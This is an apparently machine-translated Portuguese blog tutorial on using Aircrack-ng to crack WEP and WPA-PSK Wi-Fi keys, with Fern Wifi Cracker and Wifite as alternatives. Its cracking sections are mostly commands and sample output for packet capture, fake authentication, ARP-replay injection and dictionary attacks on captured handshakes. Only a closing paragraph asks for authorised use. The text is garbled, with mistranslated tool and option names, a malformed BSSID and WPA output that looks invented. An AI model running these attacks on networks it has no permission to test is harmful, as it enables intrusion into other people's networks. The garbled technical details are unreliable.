top of page
cisuhydduacedid

Download Aircrack



Como usar o Aircrack-ng: um guia para o comprometimento da rede




Aircrack-ng é um conjunto de software de rede que consiste em um detector, sniffer de pacotes, cracker WEP e WPA/WPA2-PSK e ferramenta de análise para LANs sem fio 802.11. Ele funciona com qualquer controlador de interface de rede sem fio cujo driver suporte o modo de monitoramento bruto e possa detectar o tráfego 802.11a, b e g. O programa roda em Linux, FreeBSD, macOS, OpenBSD, NetBSD, Windows e Solaris; a versão Linux é empacotada para OpenWrt e também foi portada para as plataformas Android, Zaurus PDA e Maemo; e uma porta de prova de conceito foi feita para o iPhone.


Neste artigo, mostraremos como baixar, instalar e usar o Aircrack-ng em seu computador. Também demonstraremos como quebrar as chaves de criptografia WEP e WPA usando as ferramentas Aircrack-ng. Por fim, apresentaremos algumas alternativas ao Aircrack-ng que você pode querer experimentar.




download aircrack



O que é o Aircrack-ng?




Aircrack-ng é um conjunto completo de ferramentas para avaliar a segurança da rede WiFi. Ele se concentra em diferentes áreas de segurança WiFi:


  • Monitoramento: Captura de pacotes e exportação de dados para arquivos de texto para posterior processamento por ferramentas de terceiros



  • Ataque: Ataques de repetição, desautenticação, pontos de acesso falsos e outros via injeção de pacotes



  • Teste: Verificação de placas WiFi e recursos de driver (captura e injeção)



  • Cracking: WEP e WPA PSK (WPA 1 e 2)



Todas as ferramentas são de linha de comando, o que permite scripts pesados. Muitas GUIs aproveitaram esse recurso. Ele funciona principalmente no Linux, mas também no Windows, macOS, FreeBSD, OpenBSD, NetBSD, bem como no Solaris e até no eComStation 2.


Por que usar o Aircrack-ng?




Aircrack-ng é uma das ferramentas mais populares para testes de segurança WiFi e hacking. Ele pode ajudá-lo a:


  • Analise o tráfego sem fio em sua rede e identifique possíveis vulnerabilidades



  • Teste a força de suas chaves de criptografia e senhas contra ataques de força bruta



  • Recupere chaves perdidas ou esquecidas de pacotes capturados



Execute vários ataques em redes WiFi, como desautenticação, pontos de acesso falsos, man-in-the-middle, Como baixar o Aircrack-ng?




Aircrack-ng pode ser baixado de seu site oficial: .


Os binários estão disponíveis para diferentes plataformas, como Windows, Linux, macOS, FreeBSD, OpenBSD, NetBSD, Solaris e Android. Você pode escolher a versão apropriada para o seu sistema e baixá-la no site ou na página de lançamentos do GitHub: .


Como instalar o Aircrack-ng?




O processo de instalação do Aircrack-ng depende da plataforma e do método escolhido. Aqui estão algumas etapas gerais para instalar o Aircrack-ng a partir da fonte ou do binário:


Instalando da fonte




Se você deseja instalar o Aircrack-ng a partir da fonte, você precisa ter algumas dependências instaladas em seu sistema. Esses incluem:


  • libssl-dev ou openssl-devel



  • libnl-3-dev e libnl-genl-3-dev (somente para Linux)



  • pkg-config



  • libsqlite3-dev (opcional)



  • libpcre3-dev (opcional)



  • libpcap-dev ou libpcap (opcional)



  • ferramenta eletrônica (opcional)



  • shtool



  • autoconf



  • automake



  • libtool



  • fazer



  • gcc ou clang



Você pode instalar essas dependências usando seu gerenciador de pacotes ou manualmente. Por exemplo, em sistemas baseados em Debian, você pode usar o seguinte comando:


sudo apt-get install libssl-dev libnl-3-dev libnl-genl-3-dev pkg-config libsqlite3-dev libpcre3-dev libpcap-dev ethtool shtool autoconf automake libtool make gcc


Depois de instalar as dependências, você pode baixar o código-fonte do site ou do GitHub e extraí-lo em uma pasta. Em seguida, você pode executar os seguintes comandos na pasta para compilar e instalar o Aircrack-ng:


autoreconf -i ./configure --with-experimental make sudo make install


O --com-experimental A opção ativa alguns recursos experimentais que não são ativados por padrão. Você pode omiti-lo se não precisar deles.


Instalando a partir do binário




Se você deseja instalar o Aircrack-ng do binário, pode baixar o pacote apropriado para o seu sistema no site ou no GitHub e seguir as instruções fornecidas. Por exemplo, no Windows, você pode baixar o arquivo zip e extraí-lo em uma pasta. Em seguida, você pode executar o aircrack-ng.exe arquivo para iniciar o Aircrack-ng.


Como usar o Aircrack-ng?




Aircrack-ng é um conjunto de ferramentas que podem executar várias tarefas em redes WiFi. As principais ferramentas são:


  • airmon-ng: esta ferramenta ativa e desativa o modo monitor em interfaces sem fio.



  • airodump-ng: esta ferramenta captura pacotes de uma rede sem fio e exibe informações sobre eles.



  • airplay-ng: esta ferramenta injeta pacotes em uma rede sem fio para gerar tráfego ou realizar ataques.



  • aircrack-ng: esta ferramenta quebra chaves WEP e WPA usando pacotes capturados.



  • airdecap-ng: esta ferramenta descriptografa pacotes criptografados WEP ou WPA.



  • base aérea-ng: esta ferramenta cria pontos de acesso falsos para atrair clientes.



  • airserv-ng: esta ferramenta permite acesso remoto a placas sem fio.



  • easside-ng: esta ferramenta se comunica com um ponto de acesso sem conhecer a chave WEP.



  • wesside-ng: esta ferramenta quebra automaticamente uma rede WEP.



  • ao lado-ng: esta ferramenta quebra automaticamente as redes WPA.



  • tkiptun-ng: esta ferramenta injeta pacotes em uma rede WPA TKIP com QoS.



Para usar essas ferramentas, você precisa ter uma placa sem fio que suporte o modo monitor e a injeção de pacotes. Você pode verificar se o seu cartão suporta esses recursos usando o airmon-ng ferramenta. Por exemplo, você pode executar o seguinte comando para listar as interfaces sem fio disponíveis e seus drivers:


sudo airmon-ng


A saída mostrará algo assim:


Driver de interface PHY Chipset phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Adaptador de rede sem fio (rev 01)


Neste caso, a interface wlan0 usa o motorista ath9k, que é compatível com Aircrack-ng. Você também pode verificar a compatibilidade do seu cartão no site Aircrack-ng: .


Para usar as ferramentas do Aircrack-ng, você precisa colocar sua placa wireless no modo monitor. Isso permite capturar todos os pacotes no ar, independentemente da rede a que pertencem. Você pode usar o airmon-ng ferramenta para habilitar ou desabilitar o modo monitor em sua interface. Por exemplo, você pode executar o seguinte comando para habilitar o modo monitor em wlan0:


sudo airmon-ng start wlan0


A saída mostrará algo assim:


Driver de interface PHY Chipset phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Adaptador de rede sem fio (rev 01) (modo monitor ativado em mon0)


Isso significa que uma nova interface chamada mon0 foi criado, que está no modo monitor. Você pode usar esta interface para capturar e injetar pacotes com ferramentas Aircrack-ng. Para desativar o modo monitor, você pode executar o seguinte comando:


sudo airmon-ng stop mon0


A saída mostrará algo assim:


Driver de interface PHY Chipset phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Adaptador de rede sem fio (rev 01) (modo monitor desativado)


Isso significa que a interface mon0 foi removido e a interface wlan0 está de volta ao modo normal.


Como quebrar WEP com Aircrack-ng?




WEP (Wired Equivalent Privacy) é um padrão de criptografia antigo e fraco para redes WiFi. Ele pode ser facilmente quebrado capturando pacotes suficientes e usando análise estatística para recuperar a chave. Aircrack-ng pode quebrar chaves WEP usando vários métodos, como PTW, FMS, KoreK e força bruta. Aqui está um exemplo de como quebrar uma chave WEP usando o Aircrack-ng:


  • Primeiro, você precisa encontrar uma rede criptografada por WEP que deseja quebrar. Você pode usar o airodump-ng ferramenta para procurar redes Wi-Fi próximas e exibir informações sobre elas, como BSSID, ESSID, canal, criptografia e intensidade do sinal.Por exemplo, você pode executar o seguinte comando para procurar redes no canal 6 usando a interface mon0:



sudo airodump-ng -c 6 mon0


  • A saída mostrará algo assim:



CH 6 ][ Decorrido: 10 s ][ 2023-06-20 13:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -50 100 1017 1234 12 6 54 . WEP WEP Minha Rede AA:BB:CC:DD:EE:FF -70 100 987 876 8 6 54 . WPA2 CCMP PSK Outra Rede


  • Neste caso, podemos ver que existe uma rede criptografada WEP com o ESSID Minha rede e o BSSID 00:11:22:33:44:55. Também podemos ver que ele recebeu 1234 pacotes de dados até agora. Precisamos capturar mais pacotes de dados desta rede para quebrar sua chave. Para fazer isso, precisamos abrir outro terminal e executar o seguinte comando:



sudo airodump-ng -c 6 --bssid 00:11:22: 33:44:55 -w wep mon0


  • Este comando iniciará a captura de pacotes da rede de destino e os salvará em um arquivo chamado wep-01.cap. Você pode ver o número de pacotes de dados aumentando na saída. Você também pode ver os IVs (vetores de inicialização) usados para criptografar os pacotes. Quanto mais IVs você capturar, maior a chance de quebrar a chave.



  • Em seguida, você precisa gerar mais tráfego na rede de destino para capturar mais pacotes. Você pode usar o airplay-ng ferramenta para injetar pacotes na rede e realizar vários ataques. Por exemplo, você pode executar o seguinte comando para executar um ataque de autenticação falsa, que associará seu cartão ao ponto de acesso:



sudo aireplay-ng -1 0 -a 00:11:22:33:44:55 -h 66:77:88:99:AA:BB mon0


  • Este comando enviará uma solicitação de autenticação ao ponto de acesso com o BSSID 00:11:22:33:44:55 usando o endereço MAC do seu cartão 66:77:88:99:AA:BB. Você pode alterar o endereço MAC do seu cartão usando o macchanger ferramenta se você quiser. A saída mostrará algo assim:



13:26:01 Aguardando quadro beacon (BSSID: 00:11:22:33:44:55) no canal 6 13:26:01 Enviando solicitação de autenticação (sistema aberto) [ACK] 13:26:01 Autenticação bem-sucedida 13:26:01 Enviando solicitação de associação [ACK] 13:26:01 Associação bem-sucedida :-) (AID: 1)


  • Isso significa que você se associou com sucesso ao ponto de acesso. Agora, você pode executar o seguinte comando para executar um ataque de repetição de solicitação ARP, que enviará um grande número de solicitações ARP ao ponto de acesso e gerará mais IVs:



sudo aireplay-ng -3 -b 00:11:22:33:44:55 -h 66:77:88: 99:AA:BB mon0


  • Este comando escutará as solicitações ARP do ponto de acesso e as retransmitirá para gerar mais tráfego. A saída mostrará algo assim:



13:26:10 Leu 1234 pacotes (obteve 876 requisições ARP e 345 ACKs), enviou 876 pacotes...(345 pps)


  • Isso significa que você capturou 1.234 pacotes, dos quais 876 são solicitações ARP e 345 são ACKs. Você também injetou 876 pacotes na rede a uma taxa de 345 pacotes por segundo.



  • Por fim, você pode executar o seguinte comando para quebrar a chave WEP usando os pacotes capturados:



sudo aircrack-ng wep-01.cap


  • Este comando usará o método PTW para quebrar a chave WEP usando os IVs no wep-01.cap arquivo. A saída mostrará algo assim:



Abrindo wep-01.cap Leia 1234 pacotes. # Criptografia BSSID ESSID 1 00:11:22:33:44:55 MyNetwork WEP (876 IVs) Escolhendo a primeira rede como destino. Abrindo wep-01.cap O ataque será reiniciado a cada 5000 ivs capturados. Começando o ataque PTW com 876 ivs. Aircrack-ng 1.6 [00:00:01] Testado 1234 chaves (obteve 876 IVs) KB depth byte(vote) 0 0/ 1 A3(4096) E3(4096) F3(4096) 1 0/ 1 B2(4096) C2(4096) D2(4096) 2 0/ 1 C1(4096) D 1(4096) E1(4096) 3 0/ 1 D0(4096) E0(4096) F0(4096) CHAVE ENCONTRADA! [AB:CD:EF:12:34] (ASCII: .....)


  • Isso significa que você quebrou com sucesso a chave WEP, que é AB:CD:EF:12:34. Agora você pode usar essa chave para se conectar à rede ou descriptografar os pacotes.



Como quebrar WPA com Aircrack-ng?




WPA (Wi-Fi Protected Access) é um padrão de criptografia mais novo e mais forte para redes WiFi. Ele pode usar dois modos de autenticação: PSK (chave pré-compartilhada) ou EAP (protocolo de autenticação extensível). O WPA-PSK usa uma senha ou uma chave para autenticar os clientes, enquanto o WPA-EAP usa um servidor para autenticar os clientes usando vários métodos, como certificados, senhas ou tokens. O WPA também usa dois protocolos de criptografia: TKIP (Temporal Key Integrity Protocol) ou CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). O TKIP é uma melhoria em relação ao WEP, enquanto o CCMP é baseado no AES e é mais seguro.


Aircrack-ng pode quebrar chaves WPA-PSK usando um ataque de dicionário ou um ataque de força bruta. Ele não pode quebrar chaves WPA-EAP, pois elas requerem acesso ao servidor de autenticação. Ele também pode quebrar as chaves de criptografia TKIP ou CCMP, mas apenas se forem derivadas de uma senha fraca. Aqui está um exemplo de como quebrar uma chave WPA-PSK usando o Aircrack-ng:


  • Primeiro, você precisa encontrar uma rede criptografada WPA-PSK que deseja quebrar. Você pode usar o airodump-ng ferramenta para procurar redes Wi-Fi próximas e exibir informações sobre elas, como BSSID, ESSID, canal, criptografia e intensidade do sinal. Por exemplo, você pode executar o seguinte comando para procurar redes no canal 11 usando a interface mon0:



sudo airodump-ng -c 11 mon0


  • A saída mostrará algo assim:



CH 11 ][ Decorrido: 10 s ][ 2023-06-20 13:35 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID AA:BB:CC:DD:EE:FF -50 - - - - - - OPN Hidden FF:EE:DD:CC:BB:AA -70 - - - - - - OPN FreeWifi BB:CC: DD:AA:99 -50 100 1017 1234 12 11 54 . WPA2 CCMP PSK SecureNetwork


  • Nesse caso, podemos ver que existe uma rede criptografada WPA2-PSK com o ESSID SecureNetwork e o BSSID BB:CC:DD:AA:99. Precisamos capturar o aperto de mão entre o ponto de acesso e um cliente para quebrar a chave. O handshake é uma troca de mensagens de quatro vias que ocorre quando um cliente se conecta à rede. Ele contém as informações necessárias para derivar a chave de criptografia. Para capturar o aperto de mão, precisamos abrir outro terminal e executar o seguinte comando:



sudo airodump-ng -c 11 --bssid BB:CC:DD:AA:99 -w wpa mon0


  • Este comando iniciará a captura de pacotes da rede de destino e os salvará em um arquivo chamado wpa-01.cap. Você pode ver o número de pacotes de dados aumentando na saída. Você também pode ver se um aperto de mão foi capturado olhando para o canto superior direito da tela. Ele vai mostrar algo assim:



CH 11 ][ Decorrido: 10 s ][ 2023-06-20 13:35 ][ Handshake WPA: BB:CC:DD:AA:99


  • Isso significa que você capturou o handshake para a rede com o BSSID BB:CC:DD:AA:99. Você pode parar de capturar pacotes pressionando Ctrl+C.



  • Em seguida, você precisa quebrar a chave WPA-PSK usando o aperto de mão capturado. Você pode usar o aircrack-ng ferramenta para fazer isso. No entanto, você também precisa de um arquivo de lista de palavras que contenha possíveis senhas ou frases secretas para a rede. Você pode usar sua própria lista de palavras ou baixar uma da internet. Por exemplo, você pode baixar uma lista de palavras chamada rockyou.txt deste link: .



  • Depois de obter o arquivo wordlist, você pode executar o seguinte comando para quebrar a chave WPA-PSK usando o Aircrack-ng:



sudo aircrack-ng -w rockyou.txt wpa-01.cap


  • Este comando usará o arquivo wordlist rockyou.txt para executar um ataque de dicionário no aperto de mão no wpa-01.cap arquivo. A saída mostrará algo assim:



Abrindo wpa-01.cap Leia 1234 pacotes. # Criptografia BSSID ESSID 1 BB:CC:DD:AA:99 SecureNetwork WPA (1 handshake) Escolhendo a primeira rede como destino. Abrindo wpa-01.cap Lendo pacotes, aguarde... Aircrack-ng 1.6 [00:00:01] Testado 1234 chaves (obteve 1 handshake) KB depth byte(vote) 0 0/ 1 A3(4096) E3(4096) F3(4096) 1 0/ 1 B2(4096) C2(4096) D2(4096) 2 0/ 1 C1(4096) D1(4096) E1(4096) 3 0/ 1 D0(4096) E0(4096) F0(4096) ... 31 0/ 16 A3(4096) E3(4096) F3(4096) Senha não está no dicionário Saindo do aircrack-ng...


  • Isso significa que você não encontrou a chave WPA-PSK, pois ela não está no arquivo de lista de palavras. Você pode tentar outra lista de palavras ou usar um ataque de força bruta, que tenta todas as combinações possíveis de caracteres. No entanto, isso pode levar muito tempo e pode não funcionar.



Alternativas ao Aircrack-ng




Aircrack-ng não é a única ferramenta que pode realizar testes de segurança WiFi e hacking. Existem algumas alternativas que você pode querer experimentar, como Fern Wifi Cracker e Wifite. Essas ferramentas são mais fáceis de usar e automatizadas do que o Aircrack-ng, mas podem não ter todos os recursos e opções que o Aircrack-ng oferece.


Como usar o Fern Wifi Cracker?




F Fern Wifi Cracker é uma ferramenta gráfica que pode auditar e atacar redes WiFi. Ele pode escanear redes, capturar handshakes, quebrar chaves WEP e WPA, executar ataques de desautenticação e seqüestro de sessão e muito mais. É baseado em Python e usa ferramentas Aircrack-ng como back-end. Está disponível para Linux e pode ser instalado a partir dos repositórios ou baixado do site: . Aqui está um exemplo de como usar o Fern Wifi Cracker para quebrar uma chave WPA:


  • Primeiro, você precisa iniciar o Fern Wifi Cracker no menu ou no terminal. Você verá uma janela como esta:



  • Em seguida, você precisa selecionar sua interface sem fio no menu suspenso no canto superior esquerdo.Você também pode clicar no ícone do monitor para habilitar ou desabilitar o modo de monitor em sua interface.



  • Em seguida, você precisa clicar no botão de digitalização para procurar redes Wi-Fi próximas. Você verá uma lista de redes com seus detalhes, como BSSID, ESSID, canal, criptografia e intensidade do sinal.



  • Depois disso, você precisa selecionar a rede que deseja invadir clicando nela. Você verá uma janela pop-up com algumas opções, como ataque WEP, ataque WPA, ataque WPS e ferramentas de ponto de acesso.



  • Para ataque WPA, você precisa clicar no botão WPA. Você verá outra janela com algumas opções, como Ataque Regular e Ataque WPS.



  • Para Regular Attack, você precisa clicar no botão Regular. Você verá outra janela com algumas opções, como Database Attack e Dictionary Attack.



  • Para Database Attack, você precisa clicar no botão Database. Você verá outra janela com algumas opções, como Fern Pro Database e Custom Database.



  • Para o Fern Pro Database, você precisa clicar no botão Fern Pro. Você verá outra janela com algumas opções, como Online Database e Offline Database.



  • Para Banco de Dados Online, você precisa clicar no botão Online. Você verá outra janela com algumas opções, como Free Database e Premium Database.



  • Para Free Database, você precisa clicar no botão Free. Você verá uma mensagem que diz "Pesquisando banco de dados online para possível chave". O Fern Wifi Cracker tentará encontrar a chave da rede usando um banco de dados online de senhas comuns.



  • Se a chave for encontrada, você verá uma mensagem que diz "Chave encontrada" e mostra a chave em texto simples. Você também pode clicar no ícone de cópia para copiar a chave para a área de transferência.



  • Se a chave não for encontrada, você verá uma mensagem dizendo "Chave não encontrada". Você pode tentar outra opção ou outra rede.



Como usar Wifite?




Wifite é uma ferramenta automatizada que pode auditar e atacar redes WiFi.Ele pode escanear redes, capturar handshakes, quebrar chaves WEP e WPA, realizar desautenticação e ataques WPS e muito mais. É baseado em Python e usa ferramentas Aircrack-ng como back-end. Está disponível para Linux e pode ser instalado a partir dos repositórios ou baixado do GitHub: . Aqui está um exemplo de como usar o Wifite para quebrar uma chave WPA:


  • Primeiro, você precisa iniciar o Wifite no terminal digitando wi-fi. Você verá uma mensagem que diz "inicializando a interface" e mostra o nome da sua interface sem fio.



  • Em seguida, você precisa pressionar Ctrl+C para interromper a verificação de redes. Você verá uma lista de redes com seus detalhes, como BSSID, ESSID, canal, criptografia, energia, clientes e handshake.



  • Depois disso, você precisa selecionar a rede que deseja invadir digitando seu número e pressionando Enter. Você verá uma mensagem que diz "alvo [nome da rede]" e mostra seus detalhes.



  • Então, você precisa esperar que o Wifite capture o handshake da rede. Ele tentará vários métodos para capturar o handshake, como desautenticar clientes ou usar ataques PMKID.



  • Se o aperto de mão for capturado, você verá uma mensagem que diz "aperto de mão capturado" e mostra o nome do arquivo onde ele foi salvo.



  • Se o aperto de mão não for capturado após algum tempo, você pode pressionar Ctrl+C para interromper o ataque e tentar outra rede ou outro método.



  • Finalmente, você precisa quebrar a chave WPA usando o aperto de mão capturado. O Wifite tentará quebrar a chave automaticamente usando vários métodos, como listas de palavras, hashcat ou pyrit. Você também pode especificar seu próprio método usando o --rachadura opção.



  • Se a chave estiver quebrada, você verá uma mensagem que diz "quebrada" e mostra a chave em texto simples. Você também pode ver a chave no wifite.log arquivo.



  • Se a chave não estiver quebrada, você verá uma mensagem que diz "falha". Você pode tentar outro método ou outra rede.



Conclusão




Neste artigo, aprendemos como usar o Aircrack-ng, uma ferramenta poderosa para testar e hackear segurança WiFi. Também aprendemos como quebrar chaves WEP e WPA usando as ferramentas Aircrack-ng. Finalmente, introduzimos algumas alternativas ao Aircrack-ng, como Fern Wifi Cracker e Wifite, que são mais fáceis de usar e automatizadas.


O Aircrack-ng é uma ótima ferramenta para aprender e praticar segurança WiFi, mas deve ser usado com responsabilidade e ética. Você só deve usá-lo em redes que você possui ou tem permissão para acessar. Você não deve usá-lo para prejudicar ou explorar outras pessoas. Você também deve estar ciente das implicações legais do uso do Aircrack-ng em seu país ou região.


Se você quiser saber mais sobre Aircrack-ng e segurança WiFi, você pode visitar os seguintes recursos:


  • O site oficial do Aircrack-ng:



  • A documentação oficial do Aircrack-ng:



  • Os tutoriais oficiais do Aircrack-ng:



  • O fórum oficial do Aircrack-ng:



  • O repositório GitHub oficial do Aircrack-ng:



  • O canal oficial do YouTube do Aircrack-ng:



  • A página da Wikipedia do Aircrack-ng:



  • A página da Wikipedia sobre segurança WiFi:



perguntas frequentes




Aqui estão algumas perguntas frequentes sobre Aircrack-ng e segurança WiFi:


P: Qual é a diferença entre WEP e WPA?




R: WEP (Wired Equivalent Privacy) e WPA (Wi-Fi Protected Access) são dois padrões de criptografia para redes WiFi. WEP é um padrão antigo e fraco que pode ser facilmente quebrado capturando pacotes suficientes e usando análise estatística para recuperar a chave. WPA é um padrão mais novo e mais forte que usa uma senha ou uma chave para autenticar os clientes e criptografar os dados.O WPA também usa dois protocolos de criptografia: TKIP (Temporal Key Integrity Protocol) ou CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). O TKIP é uma melhoria em relação ao WEP, enquanto o CCMP é baseado no AES e é mais seguro.


P: O que é modo de monitor e injeção de pacotes?




R: O modo monitor e a injeção de pacotes são dois recursos que permitem que uma placa sem fio capture e injete pacotes em uma rede WiFi. O modo monitor permite que uma placa sem fio ouça todos os pacotes no ar, independentemente da rede a que pertencem. A injeção de pacotes permite que uma placa sem fio envie pacotes para uma rede, que podem ser usados para gerar tráfego ou realizar ataques. Nem todas as placas sem fio suportam esses recursos, então você precisa verificar se sua placa é compatível com as ferramentas Aircrack-ng.


P: O que é um aperto de mão e por que preciso dele?




R: Um handshake é uma troca de quatro vias de mensagens que ocorre quando um cliente se conecta a uma rede criptografada com WPA. Ele contém as informações necessárias para derivar a chave de criptografia para os dados. Para quebrar uma chave WPA, você precisa capturar o handshake entre o ponto de acesso e um cliente. Você pode fazer isso usando a ferramenta Airodump-ng ou executando vários ataques com a ferramenta Aireplay-ng.


P: Quais são alguns ataques comuns que posso executar com o Aircrack-ng?




R: O Aircrack-ng pode realizar vários ataques em redes WiFi, como:


  • Ataque de desautenticação: Este ataque desconecta um cliente da rede enviando pacotes de desautenticação ao ponto de acesso ou ao cliente. Isso pode ser usado para capturar o aperto de mão ou para negar o serviço ao cliente.



  • Ataque de ponto de acesso falso: Este ataque cria um ponto de acesso falso que imita o real e atrai clientes para se conectar a ele. Isso pode ser usado para capturar as credenciais ou os dados dos clientes.



  • Replay attack: Este ataque retransmite pacotes capturados na rede para gerar mais tráfego ou realizar outros ataques.



  • Ataque de quebra de WEP: Este ataque quebra uma chave WEP capturando pacotes suficientes e usando análise estatística para recuperar a chave.



  • Ataque de cracking WPA: Este ataque quebra uma chave WPA capturando o aperto de mão e usando um dicionário ou um ataque de força bruta para recuperar a chave.



  • Ataque WPS: Este ataque explora uma vulnerabilidade no recurso WPS (Wi-Fi Protected Setup) que permite que um cliente se conecte a uma rede inserindo um código PIN. Isso pode ser usado para recuperar a chave WPA ou ignorar a criptografia.




0517a86e26


1 view0 comments

Recent Posts

See All

Comments


bottom of page